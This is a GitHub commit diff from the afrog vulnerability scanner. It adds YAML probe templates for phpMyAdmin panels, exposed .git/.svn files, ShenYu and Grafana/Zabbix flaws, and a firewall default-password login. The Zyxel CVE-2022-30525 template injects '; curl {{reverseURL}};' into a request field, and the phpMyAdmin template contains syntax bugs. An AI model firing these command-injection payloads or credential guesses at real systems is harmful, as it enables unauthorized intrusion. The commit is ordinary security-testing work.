Skip to content

Commit

Permalink
add 72 pocs
Browse files Browse the repository at this point in the history
  • Loading branch information
zan8in committed Jul 10, 2022
1 parent 5805563 commit 959cd33
Show file tree
Hide file tree
Showing 80 changed files with 172 additions and 132 deletions.
29 changes: 0 additions & 29 deletions afrog-pocs/CVE/2022/CVE-2022-30525.yaml

This file was deleted.

74 changes: 0 additions & 74 deletions afrog-pocs/fingerprint/phpmyadmin-panel.yaml

This file was deleted.

4 changes: 2 additions & 2 deletions cmd/rules/main.go
Original file line number Diff line number Diff line change
Expand Up @@ -8,8 +8,8 @@ import (
)

func main() {
c := catalog.New("./afrog-pocs")
allPocsYamlSlice, err := c.GetPocPath("./afrog-pocs")
c := catalog.New("./pocs/afrog-pocs")
allPocsYamlSlice, err := c.GetPocPath("./pocs/afrog-pocs")
if err != nil && len(allPocsYamlSlice) == 0 {
fmt.Println("未找到可执行脚本(POC),请检查`默认脚本`或指定新の脚本(POC)")
}
Expand Down
2 changes: 1 addition & 1 deletion internal/runner/banner.go
Original file line number Diff line number Diff line change
Expand Up @@ -9,7 +9,7 @@ import (
)

func ShowBanner() string {
return log.LogColor.Bold("afrog ") + log.LogColor.Banner("人生如戏.戏如梦")
return log.LogColor.Bold("afrog ") + log.LogColor.Banner("真的想你")
}

func ShowUsage() string {
Expand Down
64 changes: 62 additions & 2 deletions pocs/afrog-pocs/a-fingerprinting/phpmyadmin-panel.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -10,5 +10,65 @@ rules:
request:
method: GET
path: /phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && "v=([a-z0-9-._]+)".bmatches(response.body)
expression: r0()
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r1:
request:
method: GET
path: /phpMyAdmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r2:
request:
method: GET
path: /xampp/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r3:
request:
method: GET
path: /web/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r4:
request:
method: GET
path: /typo3/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r5:
request:
method: GET
path: /forum/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r6:
request:
method: GET
path: /php/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r7:
request:
method: GET
path: /phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r8:
request:
method: GET
path: /blog/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body
r9:
request:
method: GET
path: /apache-default/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r10:
request:
method: GET
path: /administrator/components/com_joommyadmin/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r11:
request:
method: GET
path: /_phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
r12:
request:
method: GET
path: /admin/phpmyadmin/
expression: response.status == 200 && response.body.bcontains(b'<title>phpMyAdmin') && response.body.bcontains(b'pmahomme') && 'v=([a-z0-9-._]+)'.bmatches(response.body)
expression: r0() || r1() || r2() || r3() || r4() || r5() || r6() || r7() || r8() || r9() | r10() || r11() || r12()
File renamed without changes.
25 changes: 25 additions & 0 deletions pocs/afrog-pocs/e-vulnerability/git-leak.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: git-leak

info:
name: Git 代码托管泄漏
author: zan8in
severity: critical

rules:
r0:
request:
method: GET
path: /.git/config
expression: response.status == 200 && response.body.bcontains(b'[core]') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
r1:
request:
method: GET
path: /.git/index
expression: response.status == 200 && response.body.bcontains(b'BIRC') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')

r2:
request:
method: GET
path: /.git/HEAD
expression: response.status == 200 && response.body.bcontains(b'refs/heads') && response.body.bcontains(b'repositoryformatversion') && response.body.bcontains(b'[branch')
expression: r0() || r1() || r2()
14 changes: 14 additions & 0 deletions pocs/afrog-pocs/e-vulnerability/svn-leak.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,14 @@
id: svn-leak

info:
name: SVM 代码托管泄漏
author: zan8in
severity: critical

rules:
r0:
request:
method: GET
path: /.svn/entries
expression: response.status == 200 && response.body.bcontains(b'-props') && response.body.bcontains(b'svn://')
expression: r0()
File renamed without changes.
Original file line number Diff line number Diff line change
@@ -1,19 +1,19 @@
id: CNVD-2020-73282

info:
name: 佑友防火墙弱口令
author: 你是猪!!!
severity: high
description: fofa title="佑友防火墙"

rules:
r1:
request:
method: POST
path: /index.php?c=user&a=ajax_save
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: username=admin&password=hicomadmin&language=zh-cn
expression: |
response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"message":') && response.raw_header.bcontains(b'Set-Cookie') && response.raw_header.bcontains(b'FWSESSID=')
id: CNVD-2020-73282

info:
name: 佑友防火墙弱口令
author: 你是猪!!!
severity: high
description: fofa title="佑友防火墙"

rules:
r1:
request:
method: POST
path: /index.php?c=user&a=ajax_save
headers:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
body: username=admin&password=hicomadmin&language=zh-cn
expression: |
response.status == 200 && response.body.bcontains(b'"success":true') && response.body.bcontains(b'"message":') && response.raw_header.bcontains(b'Set-Cookie') && response.raw_header.bcontains(b'FWSESSID=')
expression: r1()
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
File renamed without changes.
20 changes: 20 additions & 0 deletions pocs/afrog-pocs/g-CVE/2022/CVE-2022-23944.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
id: CVE-2022-23944

info:
name: Apache ShenYu Admin Unauth Access
author: cckuakilong
severity: critical
description: Apache ShenYu suffers from an unauthorized access vulnerability where a user can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
reference:
- https://github.com/apache/incubator-shenyu/pull/2462
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
- https://lists.apache.org/thread/dbrjnnlrf80dr0f92k5r2ysfvf1kr67y

rules:
r0:
request:
method: GET
path: /plugin
expression: response.status == 200 && response.body.bcontains(b'"message":"query success"') && response.body.bcontains(b'"code":200')
expression: r0()
20 changes: 20 additions & 0 deletions pocs/afrog-pocs/g-CVE/2022/CVE-2022-26148.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
id: CVE-2022-26148

info:
name: Grafana & Zabbix Integration - Credentials Disclosure
author: Geekby
severity: critical
description: |
Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.
reference:
- https://2k8.org/post-319.html
- https://security.netapp.com/advisory/ntap-20220425-0005/
- https://nvd.nist.gov/vuln/detail/CVE-2022-26148

rules:
r0:
request:
method: GET
path: /login?redirect=%2F
expression: response.status == 200 && (response.body.bcontains(b'"zabbix":') || response.body.bcontains(b'"zbx":') || response.body.bcontains(b'alexanderzobnin-zabbix-datasource')) && '"password":"(.*?)"'.bmatches(response.body) && '"username":"(.*?)"'.bmatches(response.body)
expression: r0()
16 changes: 10 additions & 6 deletions pocs/afrog-pocs/g-CVE/2022/CVE-2022-30525.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -2,12 +2,15 @@ id: CVE-2022-30525

info:
name: Zyxel Firewall - OS Command Injection
author: zan8in
author: h1ei1,prajiteshsingh
severity: critical
description: |
Rapid7 发现并报告了一个漏洞,该漏洞影响支持零接触配置 (ZTP) 的 Zyxel 防火墙,其中包括 ATP 系列、VPN 系列和 USG FLEX 系列(包括 USG20-VPN 和 USG20W-VPN)。该漏洞标识为 CVE-2022-30525,允许未经身份验证的远程攻击者以nobody受影响设备上的用户身份执行任意代码。
title="USG FLEX"
An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
reference:
- https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
- https://github.com/rapid7/metasploit-framework/pull/16563
- https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
- https://nvd.nist.gov/vuln/detail/CVE-2022-30525
- http://wiki.peiqi.tech/wiki/iot/Zyxel/Zyxel%20USG%20FLEX%20handler%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20CVE-2022-30525.html

set:
Expand All @@ -20,6 +23,7 @@ rules:
path: /ztp/cgi-bin/handler
headers:
Content-Type: application/json
body: "{\"command\":\"setWanPortSt\",\"proto\":\"dhcp\",\"port\":\"4\",\"vlan_tagged\":\"1\",\"vlanid\":\"5\",\"mtu\":\"; curl {{reverseURL}};\",\"data\":\"hi\"}"
expression: reverse.wait(5)
expression: r0()
body: |
{"command":"setWanPortSt","proto":"dhcp","port":"4","vlan_tagged":"1","vlanid":"5","mtu":"; curl {{reverseURL}};","data":"hi"}
expression: response.status == 500 && reverse.wait(5)
expression: r0()

0 comments on commit 959cd33

Please sign in to comment.